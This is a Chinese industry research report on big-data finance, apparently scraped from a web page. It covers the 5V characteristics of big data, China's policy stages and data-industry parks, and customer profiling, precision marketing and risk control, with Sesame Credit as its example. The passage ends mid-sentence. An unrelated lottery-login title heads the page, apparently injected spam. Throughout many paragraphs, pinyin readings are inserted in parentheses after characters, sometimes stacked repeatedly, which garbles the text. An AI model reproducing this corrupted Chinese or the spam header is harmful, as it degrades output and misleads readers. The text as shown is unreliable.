ag8彩票登录

大数据金融产业研究报告

发布时间:2020-06-24 点击量:297 作者:战略研究部—孙坚 战略研究部—王谭熠

一、大数据定义

(一)大数据定义

大(da)(da)数(shu)据(ju)(ju)(Big Data)是(shi)一个宽泛的概念,业界尚未形(xing)成(cheng)统一的定义,2011年,美(mei)国(guo)麦肯锡在研究报告《大(da)(da)数(shu)据(ju)(ju)的下一个前沿:创新、竞争(zheng)和生产力》中给出(chu)了大(da)(da)数(shu)据(ju)(ju)的定义:大(da)(da)数(shu)据(ju)(ju)是(shi)指大(da)(da)小超出(chu)典型数(shu)据(ju)(ju)库软件工具(ju)收(shou)集(ji)、存储、管理和分析能力的数(shu)据(ju)(ju)集(ji)。而根(gen)据(ju)(ju)Gartner的定义,大(da)(da)数(shu)据(ju)(ju)是(shi)需(xu)要新处(chu)理模式才(cai)能具(ju)有更强的决(jue)策力、洞察发现力和流程优化能力的海(hai)量、高增(zeng)长(zhang)率和多样化的信息(xi)资产。

在互联网日益发达的时代,大数据无所不在,基于用户的每一个日常动作,都可能产生数据,将这些分散的数据汇集形成数据流,数据服务商利用特定的技术将这些数据流进行加工整理并应用于具体场景,最终形成具有使用价值的大数据。可见,大数据的概念中并非仅仅包含数据本身,也包括对数据的处理技术,此外,只有将大数据应用于合适的场景中,才能最终展示大数据的价值。

(二)大(da)数据的5V特征

1.大体量性(Volume)

大体量性是指数据量的规模大,并且数据量呈持续增长趋势。目前大数据一般指超过10T规模的数据量,但未来随着技术的进步,符合大数据标准的数据集的大小也会变化。导致数据规模激增的主要原因在于:一是传感器等仪器获取数据的能力大幅提升,越来越多的事物特征被感知,相应的特征数据会以数据的形式被存储下来。二是互联网的普及,数据的分享和获取日益容易。三是集成电路价格和技术成熟,使得多数数据被保留下来。国际数据资讯(IDC)公司监测,全球数据量大约2年翻一番,预计2020年,全球将有35ZB的数据量。

2.时效性(Velocity)

时效性是指在数据量特别大的情况下,能够在一定时间和范围内得到及时处理,这是大数据区别于传统数据挖掘最显著的特征。只有对大数据做到实时创建、实时存储、实时处理和实时分析,才能及时有效获取高价值的信息。

3.多样性(Variety)

多样性指是大数据包括多种不同格式和不同类型的数据。数据来源的多样性导致数据类型的多样性。根据数据是否具有一定的模式、结构和关系,数据可分为三种基本类型:一是结构化数据,指遵循一个标准的模式和结构,以二维表格的形式存储在关系型数据库里的行数据,关系型数据库发展较为成熟,因此结构化数据的存储、分析方法也发展的较为全面;二是非结构化数据,是指不遵循统一的数据结构或模型的数据(如文本、图像、视频、音频等),这部分数据在企业数据中占比增长速率更快,对非结构化数据的处理分析过程也更为复杂;三是半结构化数据,是指有一定的结构性,但本质上不具有关系性,介于完全结构化数据和完全非结构化数据之间的数据,常见来源包括电子转换数据(EDI)文件、扩展表、RSS源、传感器数据。

4.真实性(Veracity)

真实性指数据的质量和保真性。结果的准确性涉及数据的可信度、偏差、噪声、异常等质量问题。保持正确的数据格式对大数据分析十分重要。

5.价(jia)值性(Value)

价值性是指通过对大数据进行分析挖掘,产生的巨大商业价值。但值得注意的是,随着数据量的增长,隐藏在数据中有意义的信息却没有成相应比例增长,相反,价值密度的高低通常与数据总量的大小成反比,因此从数据中获取有效信息的难度在加大。

(三(san))大(da)数据(ju)技术的基本(ben)框架

一个典型的大数(shu)据(ju)(ju)的技(ji)术框架可以分(fen)为(wei)四(si)个层次,即数(shu)据(ju)(ju)输入层、数(shu)据(ju)(ju)存(cun)储层、数(shu)据(ju)(ju)计算层和数(shu)据(ju)(ju)分(fen)析层,此外,通过资源管(guan)理保障系统整体的平(ping)稳运行。

 

1.数据输入:在数据采集的过程中,数据源会影响大数据质量的真实性、完整性、一致性、准确性和安全性。大规模的数据经过采集步骤后,才能进行后续的处理和运营。对于金融企业而言,数据来源一般分为三部分,即金融机构自身业务积累的数据,外部采集的数据和从第三方购买的数据。从数据类型上看,除传统的结构化数据外,文本、图像等非结构化或半结构化数据的应用也日益广泛。

2.数据存储:负责大规模数据的存储工作,主要利用分布式和多副本策略保证大数量级的数据安全有效的进行存储,从而为数据分析提供支持。

3.数据计算:负责大规模数据的计算工作,利用分布式和观范化的编程框架,将单机难以处理的数据分散到多台机器上进行分析处理,从而使大规模数据挖掘成为可能。

4.数据分析:将大数据与具体业务场景相结合,通过计算机深度学习等上层数据应用技术,将大数据转化为有价值的信息,实现业务增值。 数据分析是大数据处理与应用的关键环节,它决定了大数据集合的价值性和可用性,以及分析预测结果的准确性。在数据分析环节,应根据大数据应用情境与决策需求,选择合适的数据分析技术,提高大数据分析结果的可用性、价值性和准确性。

5.资源管理:负责大数据资产的管理工作,利用调度队列、实时监测等机制,随时监控物理设备的健康状况并自动调度,保证集群工作质量。


二、大数据产业发展概况

大(da)数(shu)据(ju)产业发展离(li)不(bu)开政策(ce)支撑。我国(guo)(guo)政府高(gao)度重视大(da)数(shu)据(ju)的发展。2014年以(yi)来,国(guo)(guo)家大(da)数(shu)据(ju)战略(lve)的谋篇布局经历(li)了四个(ge)不(bu)同阶段。

1.预热(re)阶段:2014年3月,“大数(shu)据”一(yi)词首(shou)次写入政(zheng)府(fu)工作报告,为我(wo)国大数(shu)据发(fa)展(zhan)的政(zheng)策环境(jing)搭建开始预热(re)。从这(zhei)一(yi)年起,“大数(shu)据”逐渐成为各(ge)(ge)级(ji)政(zheng)府(fu)和社会各(ge)(ge)界的关注热(re)点,中央政(zheng)府(fu)开始提供积极的支持政(zheng)策与适(shi)度宽松的发(fa)展(zhan)环境(jing),为大数(shu)据发(fa)展(zhan)创造机(ji)遇(yu)。

2.起步阶段:2015年8月31日,国(guo)务院正(zheng)式印发(fa)了《促进大(da)数(shu)(shu)据(ju)(ju)(ju)发(fa)展行(xing)动纲要》(国(guo)发(fa)〔2015〕50号(hao)),成为我国(guo)发(fa)展大(da)数(shu)(shu)据(ju)(ju)(ju)的首部(bu)战略(lve)性指导文件(jian),对包括(kuo)大(da)数(shu)(shu)据(ju)(ju)(ju)产业(ye)在内的大(da)数(shu)(shu)据(ju)(ju)(ju)行(xing)业(ye)整体发(fa)展作出部(bu)署,体现出国(guo)家层(ceng)面对大(da)数(shu)(shu)据(ju)(ju)(ju)发(fa)展的顶层(ceng)设(she)计和统筹布局。

3.落地阶段:《十三(san)五(wu)规划(hua)纲(gang)要》的公布标志着国家大(da)(da)(da)数(shu)据战略(lve)的正式(shi)提出,彰(zhang)显了中央(yang)对于(yu)大(da)(da)(da)数(shu)据战略(lve)的重视。2016年(nian)12月,工信部发布《大(da)(da)(da)数(shu)据产(chan)业发展规划(hua)(2016-2020 年(nian))》,为大(da)(da)(da)数(shu)据产(chan)业发展奠定(ding)了重要的基(ji)础。

4.深化阶段:国(guo)(guo)内(nei)大数(shu)据(ju)行业迎来(lai)全面良好的发(fa)展(zhan)态势(shi),国(guo)(guo)家大数(shu)据(ju)战略也(ye)开始走向深化阶段。2017年(nian)(nian)10月,党的十(shi)九大报告中(zhong)提出推动大数(shu)据(ju)与实体(ti)经济(ji)深度融(rong)合,为大数(shu)据(ju)产(chan)业的未来(lai)发(fa)展(zhan)指(zhi)明(ming)方(fang)向。2017年(nian)(nian)12月,中(zhong)央政治局就(jiu)实施国(guo)(guo)家大数(shu)据(ju)战略进(jin)行了集体(ti)学习。2017年(nian)(nian)以(yi)来(lai),每年(nian)(nian)的政府工作报告中(zhong)都有涉及大数(shu)据(ju)的内(nei)容。

在(zai)上述大(da)数(shu)(shu)据(ju)产业(ye)(ye)政(zheng)(zheng)策出台的(de)(de)(de)同时(shi),2016年G20杭州峰会(hui)发布了(le)《二(er)十国集团数(shu)(shu)字(zi)(zi)(zi)(zi)经(jing)(jing)(jing)(jing)济(ji)(ji)发展(zhan)与合作(zuo)倡议》,并提出了(le)发展(zhan)“数(shu)(shu)字(zi)(zi)(zi)(zi)经(jing)(jing)(jing)(jing)济(ji)(ji)”的(de)(de)(de)新(xin)(xin)理念。数(shu)(shu)字(zi)(zi)(zi)(zi)经(jing)(jing)(jing)(jing)济(ji)(ji)是(shi)(shi)以信(xin)(xin)(xin)(xin)(xin)(xin)息(xi)和(he)(he)知(zhi)识的(de)(de)(de)数(shu)(shu)字(zi)(zi)(zi)(zi)化(hua)为(wei)(wei)关键生产要素、以现代(dai)信(xin)(xin)(xin)(xin)(xin)(xin)息(xi)网络为(wei)(wei)重要载体、以有效利(li)用(yong)信(xin)(xin)(xin)(xin)(xin)(xin)息(xi)通(tong)信(xin)(xin)(xin)(xin)(xin)(xin)技(ji)(ji)(ji)(ji)(ji)术(shu)为(wei)(wei)提升效率和(he)(he)优(you)化(hua)经(jing)(jing)(jing)(jing)济(ji)(ji)结构的(de)(de)(de)重要动(dong)(dong)力(li)的(de)(de)(de)一系列经(jing)(jing)(jing)(jing)济(ji)(ji)活动(dong)(dong)。数(shu)(shu)字(zi)(zi)(zi)(zi)经(jing)(jing)(jing)(jing)济(ji)(ji)要求综合推(tui)(tui)进(jin)数(shu)(shu)字(zi)(zi)(zi)(zi)产业(ye)(ye)化(hua)和(he)(he)产业(ye)(ye)数(shu)(shu)字(zi)(zi)(zi)(zi)化(hua)两方面(mian)工作(zuo)。实现数(shu)(shu)字(zi)(zi)(zi)(zi)产业(ye)(ye)化(hua), 就是(shi)(shi)不断促使信(xin)(xin)(xin)(xin)(xin)(xin)息(xi)领域(yu)的(de)(de)(de)科(ke)研成(cheng)(cheng)果转化(hua)为(wei)(wei)数(shu)(shu)字(zi)(zi)(zi)(zi)技(ji)(ji)(ji)(ji)(ji)术(shu)、数(shu)(shu)字(zi)(zi)(zi)(zi)技(ji)(ji)(ji)(ji)(ji)术(shu)转化(hua)为(wei)(wei)数(shu)(shu)字(zi)(zi)(zi)(zi)产业(ye)(ye),推(tui)(tui)动(dong)(dong)包括电(dian)子信(xin)(xin)(xin)(xin)(xin)(xin)息(xi)制造业(ye)(ye)、电(dian)信(xin)(xin)(xin)(xin)(xin)(xin)业(ye)(ye)、计算机软(ruan)件和(he)(he)信(xin)(xin)(xin)(xin)(xin)(xin)息(xi)技(ji)(ji)(ji)(ji)(ji)术(shu)服(fu)务业(ye)(ye)在(zai)内的(de)(de)(de)信(xin)(xin)(xin)(xin)(xin)(xin)息(xi)通(tong)信(xin)(xin)(xin)(xin)(xin)(xin)产业(ye)(ye)的(de)(de)(de)持续健(jian)康发展(zhan)。实现产业(ye)(ye)数(shu)(shu)字(zi)(zi)(zi)(zi)化(hua),则(ze)是(shi)(shi)推(tui)(tui)动(dong)(dong)互联(lian)网、大(da)数(shu)(shu)据(ju)、人工智(zhi)能(neng)(neng)等新(xin)(xin)技(ji)(ji)(ji)(ji)(ji)术(shu)和(he)(he)实体经(jing)(jing)(jing)(jing)济(ji)(ji)的(de)(de)(de)深度融合,充分(fen)发挥(hui)网络信(xin)(xin)(xin)(xin)(xin)(xin)息(xi)技(ji)(ji)(ji)(ji)(ji)术(shu)在(zai)产业(ye)(ye)升级、产品开发、服(fu)务创新(xin)(xin)等方面(mian)的(de)(de)(de)优(you)势,利(li)用(yong)现代(dai)信(xin)(xin)(xin)(xin)(xin)(xin)息(xi)技(ji)(ji)(ji)(ji)(ji)术(shu)对国民(min)经(jing)(jing)(jing)(jing)济(ji)(ji)各(ge)部门进(jin)行全方位、多角度、全链(lian)条的(de)(de)(de)升级和(he)(he)改造。此外,随着(zhe)新(xin)(xin)型智(zhi)慧城市和(he)(he)新(xin)(xin)一代(dai)信(xin)(xin)(xin)(xin)(xin)(xin)息(xi)技(ji)(ji)(ji)(ji)(ji)术(shu)(人工智(zhi)能(neng)(neng)、大(da)数(shu)(shu)据(ju)、云计算和(he)(he)5G等)的(de)(de)(de)兴起,协同推(tui)(tui)进(jin)新(xin)(xin)型智(zhi)慧城市、数(shu)(shu)字(zi)(zi)(zi)(zi)经(jing)(jing)(jing)(jing)济(ji)(ji)、数(shu)(shu)字(zi)(zi)(zi)(zi)政(zheng)(zheng)府和(he)(he)数(shu)(shu)字(zi)(zi)(zi)(zi)社会(hui)建(jian)设(she),大(da)力(li)发展(zhan)新(xin)(xin)一代(dai)信(xin)(xin)(xin)(xin)(xin)(xin)息(xi)技(ji)(ji)(ji)(ji)(ji)术(shu),成(cheng)(cheng)为(wei)(wei)各(ge)级政(zheng)(zheng)府加快推(tui)(tui)动(dong)(dong)数(shu)(shu)字(zi)(zi)(zi)(zi)化(hua)转型,落地(di)数(shu)(shu)字(zi)(zi)(zi)(zi)中国建(jian)设(she)的(de)(de)(de)可行举措(cuo)。

2015年以来(lai)各级(ji)政(zheng)府的数(shu)据(ju)意识(shi)显(xian)著提升,逐步开始重视(shi)大(da)数(shu)据(ju)等数(shu)字(zi)技术(shu)对(dui)经(jing)济社会(hui)转(zhuan)型发(fa)展的积极(ji)作用,纷纷组建大(da)数(shu)据(ju)管(guan)理(li)机(ji)构,如大(da)数(shu)据(ju)管(guan)理(li)局、大(da)数(shu)据(ju)发(fa)展管(guan)理(li)委(wei)员会(hui)、大(da)数(shu)据(ju)管(guan)理(li)办公室等。统计显(xian)示(shi),截至2018年底,全国共有16个省级(ji)行政(zheng)区(qu)域,以及79个副省级(ji)和地级(ji)市先后成立了大(da)数(shu)据(ju)管(guan)理(li)机(ji)构,统筹推进(jin)区(qu)域大(da)数(shu)据(ju)产(chan)业发(fa)展。

各地的(de)(de)大(da)数据(ju)(ju)综合试(shi)验区(qu)和(he)大(da)数据(ju)(ju)产业(ye)园(yuan)成为区(qu)域(yu)内集(ji)聚产业(ye)资(zi)源的(de)(de)重(zhong)要(yao)载体。当前,不仅八个(ge)国家级大(da)数据(ju)(ju)综合试(shi)验区(qu)(贵州、京津冀、辽(liao)宁、内蒙古、上海、河(he)南、重(zhong)庆、珠三角)的(de)(de)大(da)数据(ju)(ju)产业(ye)园(yuan)/基地快(kuai)速(su)发(fa)展(zhan),与这些试(shi)验区(qu)毗(pi)邻的(de)(de)省份,如安徽(hui)、湖(hu)北、四川、陕西、浙江、山东和(he)江苏,也都加(jia)快(kuai)落实“大(da)数据(ju)(ju)产业(ye)园(yuan)区(qu)/基地”建(jian)设,意图增(zeng)强数字经济发(fa)展(zhan)实力(li),助力(li)产业(ye)转型升(sheng)级。

目前,各地大数据产业园可以划分为三类:一是北京、上海、广州和深圳的大数据产业园,此类产业园多脱胎于原先的各类软件园,具有良好的发展基础和优势。二是河南、重庆、大连、沈阳、内蒙古、贵州等国家大数据综合试验区,响应国家号召,推动辖区内的产业园加速涌现并壮大。三是部分中、东部省份,如安徽、江苏和浙江等,积极顺应产业发展趋势,布局大数据产业园,加快经济社会高质量发展。


 

此(ci)外,全省部(bu)分地市州均成立了大数(shu)据管理局(或类(lei)似职能(neng)部(bu)门)


大数据产业园通常的建设思路是:产业园的建设,重点在于强化数字基础设施建设,特别是数据中心和云计算中心的建设,同时,依托地方行政力量强化政府数据资源的汇集,逐步搭建多维度主题数据库;依托智慧城市项目招引一批大中小企业落地,其中大型企业负责平台建设,小型企业负责具体的应用开发;完善产业政策,以产业基金等形式助力大数据企业发展;鼓励企业上云用云,并结合区域特色,落地各类大数据应用解决方案。


三、大数据(ju)金融(rong)

大数据金融是指运用大数据技术和大数据平台开展金融活动和金融服务,通过收集和整合业务开展过程中积累的大数据以及外部数据中海量的(非)结构化数据,综合运用大数据、互联网、云计算等信息化手段,对客户消费数据进行实时分析,为金融企业提供客户全方位信息,通过分析和挖掘客户的交易和消费信息掌握客户的消费习惯,准确预测客户行为,提高金融服务平台效率,降低业务风险。

(一)大(da)数据金融(rong)与金融(rong)大(da)数据

金融大数据可以理解为大数据中蕴含的反映金融交易行为的基本信息,金融大数据具有大量性、多维度性和完备性等特征。彭特兰等社会物理学家认为人们面对未来决策存在“想法流”,这个想法流与人们行为之间有着可靠的数量关系,它会改变人的选择并能够推动创新。在此观点下,可以把已经发生事件的行为数据,定义为金融机构、金融业务其他相关方的“行为数据流”,把尚未发生但即将会发生事件的行为数据,定义为金融机构、金融业务其他相关方的“想法数据流”。可得到以下等式:

金(jin)融大数(shu)据(ju)(ju) = 行为数(shu)据(ju)(ju)流(liu) + 想(xiang)法数(shu)据(ju)(ju)流(liu) = 历(li)史数(shu)据(ju)(ju) + 现(xian)期(qi)数(shu)据(ju)(ju) + 未来数(shu)据(ju)(ju) = 数(shu)字(zi)化数(shu)据(ju)(ju) + 非(fei)数(shu)字(zi)化数(shu)据(ju)(ju)

在传统金融业务(wu)(wu)模式下,更(geng)多(duo)(duo)的(de)(de)(de)(de)利用的(de)(de)(de)(de)是历(li)史数(shu)(shu)据和数(shu)(shu)字(zi)化(hua)数(shu)(shu)据,对(dui)包含更(geng)多(duo)(duo)业务(wu)(wu)信息价(jia)值的(de)(de)(de)(de)现期(qi)数(shu)(shu)据(实时数(shu)(shu)据)、未来数(shu)(shu)据和非(fei)数(shu)(shu)字(zi)化(hua)数(shu)(shu)据的(de)(de)(de)(de)使用较(jiao)少(shao)。

大数据金融是指运用大数据分析方法从事金融活动的方法和过程,即金融业务参与方依靠云计算、机器学习、物联网、区块链等人工智能技术来匹配金融大数据的方法和过程。较之于金融大数据,大数据金融关注大数据工具的选择和运用,注重在金融活动具体场景中追求效用的最大化,在现已运用的科技中,云平台是搜集、分类大数据的基础,集约化云计算是加工和处理大数据的主要技术手段,机器学习、物联网、区块链等其他人工智能技术则是对多维度大数据进行甄别、判断和预测的主要分析工具。要正确把握金融大数据内涵从而消除金融活动不确定性,关键在于不仅要能加工和处理历史数据,而且要能加工和处理现期数据和未来数据,并且能够从历史数据、现期数据和未来数据中获得准确信息。

在(zai)金融(rong)行(xing)业不(bu)同(tong)(tong)的细(xi)分(fen)(fen)行(xing)业中,大数据的使用场景有所(suo)不(bu)同(tong)(tong),银行(xing)业更多地将大数据金融(rong)技术应(ying)用于(yu)精(jing)准营(ying)销(xiao)、风险管控和运(yun)营(ying)优化(hua)等方面;保险行(xing)业依托大数据开展(zhan)(zhan)客户(hu)细(xi)分(fen)(fen)和精(jing)细(xi)化(hua)营(ying)销(xiao),开展(zhan)(zhan)欺诈行(xing)为分(fen)(fen)析,精(jing)细(xi)化(hua)运(yun)营(ying);证券行(xing)业主要用于(yu)股价(jia)预测、客户(hu)关系管理等方面。

在大数据技术日益成熟的背景下,大数据征(zheng)信(xin)(xin)行(xing)(xing)业发展也进入快车道,2015年6月,芝麻信(xin)(xin)用(yong)签(qian)约北京银(yin)行(xing)(xing),也开启商业银(yin)行(xing)(xing)应用(yong)互联网征(zheng)信(xin)(xin)的先河,大数据征(zheng)信(xin)(xin)逐渐成为金融行(xing)(xing)业重要的应用(yong)领域。

(二(er))依(yi)托大(da)数据实现(xian)对客(ke)户(hu)动态画像

大数据客户画像是对现实世界中客户的数字建模,其本质是将金融大数据通过算法标签化客户的信息与行为特征,完美地抽象出一个用户的信息全貌,为进一步精准、快速分析用户行为习惯、消费习惯等重要信息,提供了基础。

1.客户(hu)画(hua)像流程

大数(shu)据(ju)技术下的客户画像的基本流程主要包(bao)括(kuo)以下几个步骤(zhou):

(1)多渠道数据整合,收集客户多维数据

传(chuan)统的客户画(hua)像,大多(duo)凭借个(ge)人经(jing)验对少(shao)量(liang)数据(ju)进(jin)行(xing)人工分析(xi),而大数据(ju)客户画(hua)像,依(yi)托(tuo)“大数据(ju)”技术搜集(ji)客户的海量(liang)数据(ju)并进(jin)行(xing)智能化的分析(xi)计算。这(zhei)就要求数据(ju)来源广泛(fan)、数据(ju)类型多(duo)样(yang)、数据(ju)内(nei)容丰富。

(2)多种算法提取特征,进行行为建模

获得(de)数(shu)据后,需要(yao)经过(guo)清洗、去重、去无效、去异常(chang)等(deng)处理,通(tong)过(guo)对数(shu)据进行加工,从而完成特征提取(qu),进行行为(wei)建模(mo),以抽象出用户的(de)标签。这一阶(jie)段,就要(yao)运(yun)用到各种算法(fa)与机器学习方法(fa),建立多种智能模(mo)型(xing),根据客户的(de)已知信(xin)息,对客户的(de)行为(wei)、偏好(hao)进行分析、猜(cai)测。

(3)标签化管理,构建全貌型客户画像

客(ke)户画像最终要用标(biao)签(qian)集合来(lai)表示。从数据提取(qu)维度来(lai)看,标(biao)签(qian)可(ke)分为事实标(biao)签(qian)、模型标(biao)签(qian)和预测(ce)标(biao)签(qian)。

事实标签(qian)(qian)是定(ding)量或定(ding)性(xing)描述(shu)客(ke)(ke)(ke)户的(de)(de)基(ji)本属(shu)性(xing)、消费属(shu)性(xing)、资(zi)源属(shu)性(xing)等(deng);模型标签(qian)(qian)是通(tong)过(guo)分析客(ke)(ke)(ke)户的(de)(de)基(ji)础数据对客(ke)(ke)(ke)户属(shu)性(xing)及(ji)行(xing)为(wei)等(deng)进(jin)行(xing)抽象和聚类,从(cong)而(er)为(wei)客(ke)(ke)(ke)户贴上相应的(de)(de)总结(jie)概括性(xing)标签(qian)(qian)及(ji)指(zhi)数,标签(qian)(qian)代表客(ke)(ke)(ke)户的(de)(de)兴趣(qu)、偏好(hao)、需求(qiu)等(deng),指(zhi)数代表客(ke)(ke)(ke)户的(de)(de)兴趣(qu)程(cheng)度、需求(qiu)程(cheng)度、购买概率等(deng);预测(ce)标签(qian)(qian)是基(ji)于客(ke)(ke)(ke)户的(de)(de)属(shu)性(xing)、行(xing)为(wei)、位置和特征(zheng),挖掘潜在(zai)的(de)(de)客(ke)(ke)(ke)户与(yu)客(ke)(ke)(ke)户潜在(zai)需求(qiu),以便针(zhen)对性(xing)地配(pei)合(he)营销(xiao)策(ce)略(lve)与(yu)规(gui)则,实现适(shi)时、适(shi)机、适(shi)景的(de)(de)营销(xiao)。

2.客户(hu)画像案例

在金融领(ling)域(yu),大(da)数据客户画像(xiang)最为成(cheng)功的(de)应用(yong)(yong)是(shi)芝麻(ma)评(ping)分(fen)模型,芝麻(ma)分(fen)主要包(bao)括五个(ge)维(wei)度(du),即信(xin)用(yong)(yong)历史、行(xing)(xing)为偏好、履约能力、身份特质和人(ren)脉(mai)关系。芝麻(ma)评(ping)分(fen)已(yi)经在多个(ge)生活(huo)场景得(de)到(dao)运用(yong)(yong),2016年(nian)与北京银行(xing)(xing)开展业务(wu)合作(zuo)以(yi)来,芝麻(ma)评(ping)分(fen)逐渐在银行(xing)(xing)企业全流程的(de)信(xin)用(yong)(yong)风险管理(li)中得(de)到(dao)应用(yong)(yong)。

(1) 数据来源

阿里巴巴和蚂蚁金服本身积累的数据,是芝麻分的一大优势。这些数据包括淘宝、天猫等电商平台网络购物的相关行为数据,支付宝平台水电煤电信缴费数据、各种生活服务场景相关数据,还有千万级以上的贷款数据。其中,贷款数据包括阿里巴巴平台上接近两百多万的小企业贷款数据,千万级的天猫分期购的数据,以及消费者无忧支付产品蚂蚁花呗的数据。

但(dan)芝麻信用的数据(ju)(ju)来(lai)源(yuan)中除内部(bu)(bu)数据(ju)(ju)外(wai),更多地来(lai)源(yuan)于外(wai)部(bu)(bu)数据(ju)(ju),外(wai)部(bu)(bu)数据(ju)(ju)大致可以分(fen)为(wei)公(gong)共部(bu)(bu)门数据(ju)(ju)、合作企业(ye)的数据(ju)(ju)、金融机构的数据(ju)(ju)、用户(hu)自(zi)主(zhu)上传的数据(ju)(ju)等几个方面(mian)。

(2)评分维度

a.身份特(te)质:是指在使用相关服务(wu)过程中留(liu)下的(de)个人(ren)基本信息,包括从公(gong)安、学(xue)历(li)学(xue)籍、工商、法院等(deng)公(gong)共部门获得的(de)个人(ren)资料,未(wei)来还可能包括网(wang)络使用习惯等(deng)可以用于推测个人(ren)性格的(de)数据(ju)。

b.履(lv)约(yue)能力:包(bao)括(kuo)享用各类信用服务(wu)并确保(bao)及(ji)时履(lv)约(yue),例如租车是否按时归还,水电煤气是否按时交费(fei)(fei)等(deng),还包(bao)括(kuo)通过消(xiao)费(fei)(fei)情(qing)况(kuang)、消(xiao)费(fei)(fei)稳定性、消(xiao)费(fei)(fei)层次等(deng)等(deng)来判(pan)断用户未来履(lv)约(yue)有什么样的(de)能力。

c.信(xin)用(yong)历(li)(li)史(shi)(shi)(shi):是指过往(wang)信(xin)用(yong)账户(hu)还(hai)款(kuan)记录及信(xin)用(yong)账户(hu)历(li)(li)史(shi)(shi)(shi)。这些历(li)(li)史(shi)(shi)(shi)包括用(yong)户(hu)在蚂蚁微贷、蚂蚁花呗等蚂蚁金服旗下服务的(de)信(xin)用(yong)历(li)(li)史(shi)(shi)(shi)、用(yong)支付宝还(hai)款(kuan)的(de)历(li)(li)史(shi)(shi)(shi),还(hai)包括用(yong)户(hu)在合作(zuo)伙伴处产生的(de)信(xin)用(yong)历(li)(li)史(shi)(shi)(shi)。

d.人脉关(guan)(guan)系:是指好(hao)友(you)的身份特征(zheng)以及跟好(hao)友(you)互动的程度。根据“物以类聚(ju)人以群分”的理论,通(tong)过转账(zhang)关(guan)(guan)系、校友(you)关(guan)(guan)系等作(zuo)为评判(pan)个人信用(yong)的依据之一。

e.行为偏好:是指在(zai)购物(wu)、缴费、转账、理财(cai)等活动中的(de)偏好及稳定性(xing)。

2016年7月(yue)19日,芝麻信(xin)(xin)(xin)(xin)(xin)用宣布研发了小微(wei)企(qi)(qi)(qi)业(ye)信(xin)(xin)(xin)(xin)(xin)用洞(dong)察“灵(ling)芝”系统,接入了司法(fa)、纳(na)税、工商、海关(guan)、企(qi)(qi)(qi)业(ye)经(jing)营(ying)、运(yun)营(ying)商等(deng)丰富的(de)(de)(de)数(shu)据源,推(tui)出了风险(xian)云图、关(guan)注名单、信(xin)(xin)(xin)(xin)(xin)用评(ping)分(fen)和指(zhi)数(shu)、风险(xian)监控预警、企(qi)(qi)(qi)业(ye)信(xin)(xin)(xin)(xin)(xin)用报告五(wu)大产品,为中小企(qi)(qi)(qi)业(ye)提供企(qi)(qi)(qi)业(ye)信(xin)(xin)(xin)(xin)(xin)用分(fen)服务。企(qi)(qi)(qi)业(ye)信(xin)(xin)(xin)(xin)(xin)用分(fen)主(zhu)要(yao)(yao)从以下(xia)五(wu)个维度进行(xing)评(ping)估(gu):一是(shi)(shi)基本(ben)信(xin)(xin)(xin)(xin)(xin)息,主(zhu)要(yao)(yao)包括公司历史和规模;二是(shi)(shi)履约历史,主(zhu)要(yao)(yao)包括企(qi)(qi)(qi)业(ye)是(shi)(shi)否(fou)涉及(ji)金融纠纷、是(shi)(shi)否(fou)有逾期(qi)等(deng)信(xin)(xin)(xin)(xin)(xin)息;三是(shi)(shi)经(jing)营(ying)行(xing)为,主(zhu)要(yao)(yao)关(guan)注企(qi)(qi)(qi)业(ye)有无造假、企(qi)(qi)(qi)业(ye)运(yun)营(ying)是(shi)(shi)否(fou)健康;四(si)是(shi)(shi)企(qi)(qi)(qi)业(ye)法(fa)定(ding)代表人的(de)(de)(de)信(xin)(xin)(xin)(xin)(xin)用状(zhuang)况(kuang);五(wu)是(shi)(shi)企(qi)(qi)(qi)业(ye)的(de)(de)(de)关(guan)联(lian)关(guan)系,主(zhu)要(yao)(yao)包含(han)关(guan)联(lian)公司以及(ji)合作伙(huo)伴的(de)(de)(de)情况(kuang)。

可见,依托大数据(ju)技术的客(ke)户(hu)画(hua)像(xiang)(xiang)是大数据(ju)在(zai)金(jin)融行(xing)业5V特(te)征的具体体现过(guo)程,通过(guo)客(ke)户(hu)画(hua)像(xiang)(xiang),实现对客(ke)户(hu)全方位的了解,能有效缓解普惠金(jin)融业务开展(zhan)中信息不对称(cheng)问题。

(三)推动业务场景(jing)化(hua)、精准化(hua)

在(zai)实现对客户画像(xiang)后,根据业务驱动的应用场(chang)景的不(bu)同,大(da)数据金(jin)融主要应用于(yu)精准营(ying)(ying)销(xiao)、风险控制、改善经营(ying)(ying)、服(fu)务创新和产品创新等五个方面。

1.精准(zhun)营销

精准营销是在对客户实现画像,精准定位客户需求的基础上,建立个性化的顾客沟通服务体系,实现企业可度量的低成本扩张之路。精准营销是相对大众营销而言的,是利用技术手段寻找精确的目标客户的营销过程。精准营销的优势在于:一是低成本,相比以往的营销体系来说,精准营销将受众面进一步缩小,在人力资源成本日益高涨的大环境下,可以节约大量的人力成本,节省推广成本。二是高效率,“精准”是精准营销体系中的一大特征,通过现代化信息技术手段对客户进行画像,对客户市场进行细分,“精准”匹配,准确接触,可以大幅提高营销的成功率。三是个性化,通过对市场的细分,直接服务目标受众,并按照客户的特殊要求进行个性化产品开发。

在大数据金融应用于精准营销方向上有一个经典的案例:某位信用卡客户月均刷卡8次,平均每次刷卡金额800元,平均每年打4次客服电话,从未有过投诉,按照传统的数据分析,该客户是位满意度较高、流失风险较低的客户。但如果看到该客户的微博,得到的真实情况是:工资卡和信用卡不在同家银行,还款不方便,好几次打客服电话没接通,客户多次在微博上抱怨,该客户流失风险较高。

2.动态风控

应用(yong)大数据技(ji)术,可以统(tong)一管理金(jin)融企(qi)业(ye)内部(bu)多源异构数据与外部(bu)征信数据,可以更好地(di)完善风控(kong)体系。内部(bu)可保(bao)障数据的完整性与安全性,外部(bu)可控(kong)制用(yong)户风险。

大数据风控并不是完全改变传统风控,而是丰富传统风控的数据纬度,依然利用信用属性强的金融数据,判断借款人的还款能力和还款意愿,并利用信用属性较弱的行为数据进行补充,一般是利用数据的关联分析来判断融资人的信用情况,借助数据模型来揭示某些行为特征和信用风险之间的关系。

金融行业在之前主要依靠经验和宏观经济形势来实施风险控制,以定性为主,更多依赖风险管理精英的个人能力,特别在经济发展很好的时期,风险管理偏好不太科学,不能够反应出真正的风险水平。定性的风险管理占主体,定量的风险管理起到很小的作用。随着巴塞尔III 协议的推行,越来越多的银行正在重视定量风险管理,积极利用风控模型来实施风险评估,但大多数国内银行的风控模型大多从国外引入,而信用风险和操作风险比较复杂,很多国外的信用风险模型效果不太明显。

较(jiao)之传统量化风控模型,大(da)数(shu)据(ju)风控使用的(de)数(shu)据(ju)范围更为(wei)广泛,大(da)数(shu)据(ju)风控优势在(zai)于:

